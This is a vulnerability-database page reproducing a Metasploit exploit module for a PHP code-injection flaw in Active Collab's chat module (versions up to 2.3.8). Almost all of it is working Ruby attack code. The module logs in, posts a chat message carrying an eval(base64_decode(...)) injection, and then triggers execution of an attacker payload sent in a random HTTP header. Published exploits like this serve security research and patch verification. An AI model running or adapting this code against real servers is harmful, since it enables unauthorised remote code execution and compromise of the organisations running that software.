Active Collab "chat module" <= 2.3.8 - Remote PHP Code Injection Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Active Collab "chat module" <= 2.3.8 - Remote PHP Code Injection Exploit. Exploits arbitrary code injection vulnerability in Active Collab chat module

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Active Collab &#34;chat module&#34; &#60;= 2.3.8 Remote PHP Code Injection Exploit&#39;,
			&#39;Description&#39;    =&#62; %q{
				This module exploits an arbitrary code injection vulnerability in the chat module 
				that is part of Active Collab by abusing a preg_replace() using the /e modifier and
				its replacement string using double quotes. The vulnerable function can be found in 
				activecollab/application/modules/chat/functions/html_to_text.php.
			},
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Author&#39;         =&#62;
				[
					&#39;mr_me &#60;steventhomasseeley[at]gmail.com&#62;&#39;,  # vuln discovery & msf module
				],
			&#39;References&#39;     =&#62;
				[
					[&#39;URL&#39;, &#39;http://www.activecollab.com/downloads/category/4/package/62/releases&#39;],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Keys&#39;        =&#62; [&#39;php&#39;],
					&#39;Space&#39;       =&#62; 4000,
					&#39;DisableNops&#39; =&#62; true,
				},
			&#39;Platform&#39;       =&#62; [&#39;php&#39;],
			&#39;Arch&#39;           =&#62; ARCH_PHP,
			&#39;Targets&#39;        =&#62; [[&#39;Automatic&#39;,{}]],
			&#39;DisclosureDate&#39; =&#62; &#39;May 30 2012&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))

		register_options(
			[
				OptString.new(&#39;URI&#39;,[true, &#34;The path to the ActiveCollab installation&#34;, &#34;/&#34;]),
				OptString.new(&#39;USER&#39;,[true, &#34;The username (e-mail) to authenticate with&#34;]),
				OptString.new(&#39;PASS&#39;,[true, &#34;The password to authenticate with&#34;])
			],self.class)
	end

	def check

		login_path = &#34;public/index.php?path_info=login&re_route=homepage&#34;
		uri = datastore[&#39;URI&#39;]
		uri += (datastore[&#39;URI&#39;][-1, 1] == &#34;/&#34;) ? login_path : &#34;/#{login_path}&#34;

		cms = send_request_raw({&#39;uri&#39; =&#62; uri}, 25)

		uri = datastore[&#39;URI&#39;]
		uri += (datastore[&#39;URI&#39;][-1, 1] == &#34;/&#34;) ? &#39;public/assets/modules/chat/&#39; : &#39;/public/assets/modules/chat/&#39;

		chat = send_request_raw({&#39;uri&#39; =&#62; uri}, 25)

		# cant detect the version here
		if (cms and cms.body =~ /powered by activeCollab/)
			# detect the chat module
			if (chat and chat.code == 200)
				return Exploit::CheckCode::Vulnerable
			end
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		user = datastore[&#39;USER&#39;]
		pass = datastore[&#39;PASS&#39;]
		p = Rex::Text.encode_base64(payload.encoded)
		header = rand_text_alpha_upper(3)
		login_uri = datastore[&#39;URI&#39;]
		login_uri += (datastore[&#39;URI&#39;][-1, 1] == &#34;/&#34;) ? &#39;public/index.php?path_info=login&#39; : &#39;/public/index.php?path_info=login&#39;

		# login
		res = send_request_cgi({
			&#39;method&#39;    =&#62; &#39;POST&#39;,
			&#39;uri&#39;       =&#62; login_uri,
			&#39;vars_post&#39; =&#62;
				{
					&#39;login[email]&#39;      =&#62; user,
					&#39;login[password]&#39;   =&#62; pass,
					&#39;submitted&#39;         =&#62; &#34;submitted&#34;,
				}
			}, 40)

		# response handling
		if res.code == 302
			if (res.headers[&#39;Set-Cookie&#39;] =~ /ac_ActiveCollab_sid_eaM4h3LTIZ=(.*); expires=/)
				acsession = $1
			end
		elsif res.body =~ /Failed to log you in/
			print_error(&#34;Could not login to the target application, check your credentials&#34;)
		elsif res.code != 200 or res.code != 302
			print_error(&#34;Server returned a failed status code: (#{res.code})&#34;)
		end

		# injection
		iuri = datastore[&#39;URI&#39;]
		iuri += (datastore[&#39;URI&#39;][-1, 1] == &#34;/&#34;) ? &#39;index.php&#39; : &#39;/index.php&#39;
		iuri &#60;&#60; &#34;?path_info=chat/add_message&async=1&#34; 
		phpkode = &#34;{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}&#34;
		injection = &#34;&#60;th&#62;\&#34;);#{phpkode}&#60;/th&#62;&#34;
		cookies = &#34;ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}&#34;
		res = send_request_cgi({
			&#39;method&#39;  =&#62; &#39;POST&#39;,
			&#39;uri&#39;     =&#62; iuri,
			&#39;headers&#39; =&#62;
				{
					&#39;cookie&#39;  =&#62; cookies
				},
			&#39;vars_post&#39; =&#62;
				{
					&#39;submitted&#39;                  =&#62; &#34;submitted&#34;,
					&#39;message[message_text]&#39;      =&#62; injection,
					&#39;message[chat_id]&#39;           =&#62; &#34;1&#34;,
					&#39;message[posted_to_user_id]&#39; =&#62; &#34;all&#34;
				}
		}, 25)

		euri = datastore[&#39;URI&#39;]
		euri += (datastore[&#39;URI&#39;][-1, 1] == &#34;/&#34;) ? &#39;public/index.php&#39; : &#39;/public/index.php&#39;
		euri &#60;&#60; &#34;?path_info=/chat/history/1&#34; 

		# execution
		res = send_request_cgi({
			&#39;method&#39;  =&#62; &#39;POST&#39;,
			&#39;uri&#39;     =&#62; euri,
			&#39;headers&#39; =&#62;
				{
					header    =&#62; p,
					&#39;cookie&#39;  =&#62; cookies
				}
		})
	end
end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1